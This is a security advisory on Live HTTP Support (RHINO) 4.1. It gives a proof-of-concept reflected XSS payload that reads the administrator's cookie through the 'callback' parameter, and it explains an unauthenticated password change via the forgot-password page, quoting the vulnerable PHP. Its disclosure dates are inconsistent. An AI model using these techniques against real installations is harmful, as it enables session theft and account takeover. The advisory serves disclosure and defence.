#; Live HTTP Support (RHINO) 4.1 Cross Site Scripting Vulner

1. Full title Live HTTP Support (RHINO) 4.1 Cross Site Scripting Vulnerability
2. Date add 2014-03-02
3. Category web applications
4. Platform php
5. Risk <font color="#FFFF00">Security Risk Medium</font>
6. Description Live HTTP Support (RHINO) version 4.1 suffers from cross site scripting and remote change password vulnerabilities.
7.  
8. =======================================
9.  
10. Advisory: Live http support (RHINO) 4.1 (Frontend) - XSS & Remote
11. Change Password
12. Author: Slotleet
13. Email: [email protected]
14. Affected Software: Successfully tested on Live http support (RHINO) 4.1
15. Vendor URL: http://www.livesupportrhino.com
16. Vendor Status: Not Fixed
17.  
18. ==========================
19. Vulnerability Description
20. ==========================
21.  
22. The Live http Support (RHINO) 4.1 (Backend) is prone to XSS & Remote Change
23. Password
24.  
25. ==========================
26. PoC-Exploit
27. ==========================
28.  
29. // Non-Persistent XSS with "callback" Parameter in
30. /include/proactive_cross.php
31.  
32. (1) Under "callback" set your GET Parameter Callback to
33. "><script>alert(document.cookie)</script>
34.  
35. The Non-Persistent XSS will be executed for the Administrator in the
36. browser (he directly logged in because you chatting with him)
37.  
38. // Remote Change Password - with "Forgot.php"
39.  
40. http://[target]/rhino/operator/index.php?p=forgot
41.  
42. (1) in the forgot file there's no condition if the user logged in or not,
43. so we can look deeply in the file in line (27-67)
44.  
45. if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
46. $defaults = $_POST;
47.  
48. $femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
49. $pass = $_POST['f_pass'];
50. $newpass = $_POST['f_newpass'];
51.  
52. if ($pass != $newpass) {
53. $errors['e1'] = $tl['error']['e10'];
54. } elseif (strlen($pass) <= '5') {
55. $errors['e1'] = $tl['error']['e11'];
56. }
57.  
58. if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
59. FILTER_VALIDATE_EMAIL)) {
60. $errors['e'] = $tl['error']['e3'];
61. }
62.  
63. $fwhen = 0;
64.  
65. $user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
66. if ($user_check == true && count($errors) == 0) {
67.  
68. // The new password encrypt with hash_hmac
69. $passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);
70.  
71. $result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
72. "'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');
73.  
74. $result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
75. email = "'.smartsql($femail).'" LIMIT 1');
76. $row = $result->fetch_assoc();
77.  
78. if (!$result) {
79. ls_redirect(JAK_PARSE_ERROR);
80. } else {
81. $lsuserlogin->lsLogin($row['username'], $pass, 0);
82. ls_redirect(BASE_URL);
83. }
84.  
85. } else {
86. $errorsf = $errors;
87. }
88. }
89.  
90. So there is an MySQL Query to execute if the email in the database (Show up
91. the change password settings).
92.  
93. ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
94. INSTALLED THE SCRIPT.
95.  
96.  
97. ==========================
98. Solution
99. ==========================
100.  
101. Send activation code to the e-mail address.
102.  
103. ==========================
104. Disclosure Timeline
105. ==========================
106.  
107. 30-Jan-2014 - developer informed by email
108. 30-Jan-2014 - Developer didn't Respond
109. 31-Jan-2014 - Still Not Respond
110. 06-Feb-2014 - Vulnerability Discovered
111.  
112. ==========================
113. Credits
114. ==========================
115.  
116. Vulnerabilities found and advisory written by Slotleet.